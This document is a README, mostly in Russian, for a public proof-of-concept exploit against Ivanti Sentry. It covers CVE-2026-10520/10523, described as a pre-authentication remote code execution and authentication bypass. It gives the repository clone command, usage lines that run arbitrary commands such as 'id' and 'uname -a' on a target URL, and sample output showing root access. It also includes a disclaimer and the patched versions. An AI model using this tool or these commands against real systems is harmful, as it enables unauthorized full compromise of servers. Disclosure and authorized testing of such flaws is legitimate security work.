
CVE-2026-10520
Pre-Authentication Remote Code Execution + Authentication Bypass
Автор: Ashraf Zaryouh "0xBlackash"
Две критические уязвимости, затрагивающие Ivanti Sentry (ранее MobileIron Sentry):
Эти уязвимости позволяют неаутентифицированным злоумышленникам полностью скомпрометировать систему.
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# Basic usage
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# Verbose mode
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# With proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# Check kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
Если уязвимость присутствует, вы увидите:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование против систем, которые вам не принадлежат, противозаконно.
Автор не несёт ответственности за неправомерное использование.
Исправлено в: 10.5.2 / 10.6.2 / 10.7.1
Сделано с ❤️ Ashraf Zaryouh "0xBlackash"
Поставьте звезду репозиторию, если он был полезен! ⭐
| Аргумент | Описание | Обязательно |
|---|
--url | Целевой URL (например, https://target:8443) | Да |
--cmd | Команда для выполнения | Да |
-v, --verbose | Включить подробный вывод | Нет |
--proxy | HTTP прокси (хост:порт) | Нет |